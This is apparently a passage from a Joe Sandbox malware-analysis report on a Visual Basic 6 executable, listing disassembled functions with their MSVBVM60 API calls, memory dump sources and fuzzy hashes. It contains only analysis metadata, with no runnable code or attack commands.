                                                                                    • API ID: __vba$AnsiError$CheckHresult$System$Move$ChkstkFreeListOverflow
                                                                                    • String ID: DISPLAY
                                                                                    • API String ID: 226413627-865373369
                                                                                    • Opcode ID: 6a05cb85e494f777eff56ca68d8a3db58f76e04dcff3142400466dc6ab06a324
                                                                                    • Instruction ID: a062e320558ca6fff28f45832f19da439656b4792b9b718fe8d8c950d48b1413
                                                                                    • Opcode Fuzzy Hash: 6a05cb85e494f777eff56ca68d8a3db58f76e04dcff3142400466dc6ab06a324
                                                                                    • Instruction Fuzzy Hash: 2BA12875940219EFDB24DF50CD89FEAB7B4FB48300F1085EAE50AA7290D7745A84DF64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0042A090 Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 103COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
                                                                                    • __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
                                                                                    • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
                                                                                    • __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
                                                                                    • __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A200
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Error$AnsiCopySystemUnicode$BstrChkstkList
                                                                                    • String ID: @2@
                                                                                    • API String ID: 653519621-343359795
                                                                                    • Opcode ID: f6150098f43948e90806c12a3c2991bf29e9ad6a5940e6859ad760a911545430
                                                                                    • Instruction ID: 4db5018945ba0d113f70efc3efbfc2014598e300a345278f9012389ef60e75fd
                                                                                    • Opcode Fuzzy Hash: f6150098f43948e90806c12a3c2991bf29e9ad6a5940e6859ad760a911545430
                                                                                    • Instruction Fuzzy Hash: B741CCB2900149EFCB04EFE4DE49EDEBBB9EB48705F108159F602B61A0DB756A44CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00404FF6 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 137COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040D86E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,00000000,Function_000032B6), ref: 0040D8B5
                                                                                    • __vbaStrCat.MSVBVM60( RO,00000000,?,00000000,Function_000032B6), ref: 0040D8ED
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 0040D8F8
                                                                                    • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,00000000,Function_000032B6), ref: 0040D911
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 0040D91C
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,00000000,Function_000032B6), ref: 0040D937
                                                                                    • __vbaStrCat.MSVBVM60( RO,00000000), ref: 0040D952
                                                                                    • __vbaStrMove.MSVBVM60(?,?,Function_000032B6), ref: 0040D95D
                                                                                    • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040D977
                                                                                    • __vbaStrMove.MSVBVM60(?,?,Function_000032B6), ref: 0040D982
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000), ref: 0040D99D
                                                                                    • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0F4,00000000,0042C0D4), ref: 0040DA0C
                                                                                    • __vbaStrCat.MSVBVM60( MR,00000000,0042C110,0042C114,0042C118,00000000,0042C0D4), ref: 0040DA33
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040DA3E
                                                                                    • __vbaFreeStr.MSVBVM60(00000000), ref: 0040DA4D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$List$#580ChkstkError
                                                                                    • String ID: MR$ RO$C$Once
                                                                                    • API String ID: 3619039755-2541133078
                                                                                    • Opcode ID: 51f8670c5577a9d60adca4f5475f3347c83c433d099adc03e5839f88fcd5abb2
                                                                                    • Instruction ID: cb69084c84231b04a80139a54d6e55147a6181afad02e942266a88f85e06280e
                                                                                    • Opcode Fuzzy Hash: 51f8670c5577a9d60adca4f5475f3347c83c433d099adc03e5839f88fcd5abb2
                                                                                    • Instruction Fuzzy Hash: 67515C71A00204EFD700DFD4DE8ABAE77B4EF48704F60816AF501B72A1DBB85A45CB69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00415D20 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 122COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrCat.MSVBVM60( !@,00409278,?,00000001), ref: 00415D70
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00415D7D
                                                                                    • __vbaStrCat.MSVBVM60(00409280,00000000,?,00000001), ref: 00415D85
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00415D8C
                                                                                    • __vbaInStr.MSVBVM60(00000000,00000000,?,00000001), ref: 00415D90
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000001), ref: 00415DA2
                                                                                    • __vbaStrCat.MSVBVM60( !@,004095AC,?,-00000001), ref: 00415DD0
                                                                                    • __vbaStrMove.MSVBVM60(?,-00000001), ref: 00415DD7
                                                                                    • __vbaStrCat.MSVBVM60(00409280,00000000,?,-00000001), ref: 00415DDF
                                                                                    • __vbaStrMove.MSVBVM60(?,-00000001), ref: 00415DE6
                                                                                    • __vbaInStr.MSVBVM60(00000000,00000000,?,-00000001), ref: 00415DEB
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,-00000001), ref: 00415DFD
                                                                                    • __vbaLenBstr.MSVBVM60 ref: 00415E10
                                                                                    • __vbaLenBstr.MSVBVM60(?,?), ref: 00415E43
                                                                                    • #631.MSVBVM60(?,-00000002,?,?), ref: 00415E59
                                                                                    • __vbaStrMove.MSVBVM60(?,-00000002,?,?), ref: 00415E64
                                                                                    • __vbaFreeVar.MSVBVM60(?,-00000002,?,?), ref: 00415E69
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 00415EB9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$BstrList$#631ErrorOverflow
                                                                                    • String ID: !@$AHA !@
                                                                                    • API String ID: 43011225-1712571822
                                                                                    • Opcode ID: 1d0fd53414f82b8a5140894465822627a2b2e4415d5277366693652de8302a8f
                                                                                    • Instruction ID: 81cdc0ee054e8d02015220d1a651034c4d5d80587a79404b4572d844a8d9d7d0
                                                                                    • Opcode Fuzzy Hash: 1d0fd53414f82b8a5140894465822627a2b2e4415d5277366693652de8302a8f
                                                                                    • Instruction Fuzzy Hash: CC412E75E00208AFC704DFA4DD85EEE7BB9EB88701F10416AF905E72A1DB749D45CBA8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00404FCF Relevance: 34.9, APIs: 23, Instructions: 352COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040CFFE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0040D02E
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000728), ref: 0040D081
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004077C4,0000001C), ref: 0040D0C9
                                                                                    • __vbaI2I4.MSVBVM60 ref: 0040D0ED
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040D0FA
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D164
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,0000004C), ref: 0040D197
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040D1CF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckHresult$Free$ChkstkError
                                                                                    • String ID:
                                                                                    • API String ID: 1728155253-0
                                                                                    • Opcode ID: 3c944235882b9afb45df9b4f0640810cfb7f24e8e2d8d4c98d1c623bf1b17505
                                                                                    • Instruction ID: 5eaa79c7dd67bbe53d223c6610bcbbbf959998076f90a4c84057eb8df8a5bbf3
                                                                                    • Opcode Fuzzy Hash: 3c944235882b9afb45df9b4f0640810cfb7f24e8e2d8d4c98d1c623bf1b17505
                                                                                    • Instruction Fuzzy Hash: 73F10374D00208EFDB14DFA4C988ADEBBB5FF48304F20816DE50AAB291D779A985CF55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00419C60 Relevance: 34.7, APIs: 23, Instructions: 171COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,Function_000032B6), ref: 00419C7E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00419CAE
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 00419CCB
                                                                                    • __vbaSetSystemError.MSVBVM60(00000002,00000000,?,?,?,00000000,Function_000032B6), ref: 00419CE7
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 00419D24
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00419D3D
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 00419D56
                                                                                    • __vbaStrFixstr.MSVBVM60(00000104,?,00000001), ref: 00419DB5
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00419DC3
                                                                                    • __vbaInStr.MSVBVM60(00000000,004099EC,00000000), ref: 00419DD1
                                                                                    • __vbaStrFixstr.MSVBVM60(00000104,?,-00000001), ref: 00419DED
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00419DFB
                                                                                    • #616.MSVBVM60(00000000), ref: 00419E02
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00419E10
                                                                                    • __vbaLsetFixstr.MSVBVM60(00000104,?,?), ref: 00419E29
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00419E51
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00419E67
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00419E83
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 00419EA8
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00419EC1
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 00419EDA
                                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 00419F0D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$System$AnsiMove$Fixstr$#616ChkstkFreeListLset
                                                                                    • String ID:
                                                                                    • API String ID: 3958989997-0
                                                                                    • Opcode ID: 79f13ceaef8f2061b8b80027d96b1a3ea6df7ed6deb9aed4509d8a0052579542
                                                                                    • Instruction ID: f493f75851a7fc0dbfc09fa37243ff87ef1c3d0c798e8d4c224362c0094269ff
                                                                                    • Opcode Fuzzy Hash: 79f13ceaef8f2061b8b80027d96b1a3ea6df7ed6deb9aed4509d8a0052579542
                                                                                    • Instruction Fuzzy Hash: D5612D71901259EFDB10EFA0CE4CBEEB778EB48305F1081E9E10AB6190DB785A84CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00422700 Relevance: 34.6, APIs: 23, Instructions: 111COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 0042271E
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042274B
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 0042275A
                                                                                    • #648.MSVBVM60(0000000A), ref: 00422779
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00422788
                                                                                    • __vbaI2I4.MSVBVM60(?), ref: 0042279C
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 004227AA
                                                                                    • __vbaI2I4.MSVBVM60 ref: 004227BA
                                                                                    • #570.MSVBVM60(00000000), ref: 004227C1
                                                                                    • __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004227CE
                                                                                    • __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 00422801
                                                                                    • #525.MSVBVM60(00000000), ref: 00422808
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00422813
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422823
                                                                                    • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 0042282E
                                                                                    • __vbaI2I4.MSVBVM60 ref: 0042283E
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0042284B
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00422866
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422876
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 0042287D
                                                                                    • __vbaFreeStr.MSVBVM60(004228BA), ref: 004228AA
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004228B3
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 004228D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$BstrFile$#516#631Error$#525#570#648ChkstkCloseCopyGet3OpenOverflowSeek
                                                                                    • String ID:
                                                                                    • API String ID: 2204187013-0
                                                                                    • Opcode ID: 033fe3c34fbbcf343d2ddb18182b1ad3dc07b0f00dff811bdd5c950921dea067
                                                                                    • Instruction ID: 20b1ae5d524e12f90e8be89b45e8a07560083909273999c33b36cc12d9e9d757
                                                                                    • Opcode Fuzzy Hash: 033fe3c34fbbcf343d2ddb18182b1ad3dc07b0f00dff811bdd5c950921dea067
                                                                                    • Instruction Fuzzy Hash: 3441DC71D00248EFDB04EFA4DB4DBDEBBB4EB48705F108169E502B76A0DB785A44CB69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004264F0 Relevance: 31.7, APIs: 21, Instructions: 182COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaAryConstruct2.MSVBVM60(?,0040A1B4,00000011,00000000,660CC33A,6600A3D7), ref: 00426547
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,00000040,?,00000000), ref: 00426571
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000002), ref: 00426582
                                                                                    • #537.MSVBVM60(00000000), ref: 00426592
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0042659F
                                                                                    • #537.MSVBVM60(?,00000000), ref: 004265AB
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004265B2
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 004265B5
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004265C0
                                                                                    • __vbaStrCmp.MSVBVM60(0040A198,00000000), ref: 004265C8
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004265E5
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00426619
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 0042662F
                                                                                    • #537.MSVBVM60(?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00426640
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 00426647
                                                                                    • __vbaStrCmp.MSVBVM60(0040A1AC,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 0042664F
                                                                                    • #537.MSVBVM60(00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00426666
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 0042666D
                                                                                    • __vbaStrCmp.MSVBVM60(0040A1A4,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00426675
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 004266AD
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00426706), ref: 004266FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$#537ErrorSystem$FreeList$Construct2Destruct
                                                                                    • String ID:
                                                                                    • API String ID: 2170920009-0
                                                                                    • Opcode ID: ee103aa960844d6c0c66a8e010ce742ea9115f4b6a67e78245a25efa224450b7
                                                                                    • Instruction ID: fe4e2f04ec6deddc8f2c7747cb95564e443f1ff94db73ec5ebb53e34e52d70e0
                                                                                    • Opcode Fuzzy Hash: ee103aa960844d6c0c66a8e010ce742ea9115f4b6a67e78245a25efa224450b7
                                                                                    • Instruction Fuzzy Hash: 4E51A371E002299BDB24DBB4CD45FEEBBB9EF48700F20822AE545FB291DA745904CF94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00428E40 Relevance: 31.7, APIs: 21, Instructions: 166COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 00428E91
                                                                                    • __vbaCastObj.MSVBVM60(00000000,0040A2F8), ref: 00428E9F
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 00428EAA
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007C4), ref: 00428ED0
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 00428EDD
                                                                                    • __vbaCastObj.MSVBVM60(00000000,0040A2F8), ref: 00428EF0
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 00428EFB
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007C4), ref: 00428F1B
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 00428F20
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007BC), ref: 00428F45
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A308,00000078), ref: 00428F65
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00428F6D
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007B0), ref: 00428F94
                                                                                    • #519.MSVBVM60(?), ref: 00428F9A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00428FA5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00428FB9
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 00428FC5
                                                                                    • __vbaLenBstr.MSVBVM60(?), ref: 00428FCF
                                                                                    • __vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 00428FFC
                                                                                    • __vbaExitProc.MSVBVM60 ref: 0042900E
                                                                                    • __vbaFreeStr.MSVBVM60(00429046), ref: 0042903F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckFreeHresult$Cast$#519BstrCopyErrorEventExitListMoveProcRaise
                                                                                    • String ID:
                                                                                    • API String ID: 2502233557-0
                                                                                    • Opcode ID: 8b414a5269651d8513c98d17b5e9cc8c7bd7953f7acd46c9466d2aa84f4a978d
                                                                                    • Instruction ID: 8420092584710669aa1959ba4e0b61b057cd928f4a57778ab52aa14ced9d5afd
                                                                                    • Opcode Fuzzy Hash: 8b414a5269651d8513c98d17b5e9cc8c7bd7953f7acd46c9466d2aa84f4a978d
                                                                                    • Instruction Fuzzy Hash: DC513C71A01218ABDB00EFA5DE48EDEBBB8FF58704F10416AF505F62A0D7789905CF69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00419820 Relevance: 31.6, APIs: 21, Instructions: 114COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041983E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,00000000,?,?,00000000,Function_000032B6), ref: 0041986E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00419889
                                                                                    • __vbaVarDup.MSVBVM60 ref: 004198A3
                                                                                    • #606.MSVBVM60(?,?), ref: 004198BA
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004198C5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004198CE
                                                                                    • __vbaStrI2.MSVBVM60(00000000,00000000), ref: 004198DF
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004198EA
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 004198F5
                                                                                    • __vbaLenBstr.MSVBVM60(?,00000000), ref: 00419900
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000), ref: 0041990F
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,00000000,000000FF,00000000), ref: 00419927
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00419935
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00419949
